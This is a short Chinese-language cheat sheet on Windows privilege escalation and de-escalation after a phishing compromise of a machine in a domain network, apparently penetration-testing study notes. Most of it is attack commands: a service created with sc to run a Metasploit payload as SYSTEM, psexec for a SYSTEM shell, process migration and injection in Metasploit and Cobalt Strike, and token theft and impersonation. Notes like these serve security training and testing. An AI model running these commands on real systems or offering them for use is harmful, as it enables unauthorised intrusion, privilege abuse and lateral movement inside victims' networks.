Win系统权限提升篇计算机用户进程注入令牌窃取服务启动远程管理

应用场景：

1、常规某个机器被钓鱼后门攻击后，我们需要做更高权限操作或权限维持等。

2、内网域中某个机器被钓鱼后门攻击后，我们需要对后续内网域做安全测试。

主要当前技术入口点：

-当前权限由钓鱼攻击获取

主要当前技术应用点：

-当前受控机在内网域环境

1、提权system与内网交互

2、降权到域用户与内网交互

#服务启动（提权）

sc是用于与服务控制管理器和服务进行通信的命令行程序。

适用版本：windows 7、10、08、12、16、19、22，早期用at命令

1、创建一个名叫syscmd的执行文件服务

sc Create syscmd binPath= "c:\msf.exe"

2、运行服务

sc start syscmd

#远程控制（提权）

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

#进程注入（降权&提权）

MSF：

ps //查看进程

migrate PID //迁移对应PID

CS:

ps //查看进程

inject PID //注入对应PID

#令牌窃取（降权&提权）

MSF：

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

CS:

ps //查看进程

steal_token PID //窃取进程令牌

spawnu PID //窃取进程令牌上线

为什么要踢权

因为当钓鱼钓到内网一台机器 但是admin用户 不能访问域用户名 只能提权成system用户 某些漏洞需要system权限

为什么要降权

因为当钓到admin用户时 无法看域用户名 也可以降权 成域的user用户来看域的用户 某些漏洞需要user权限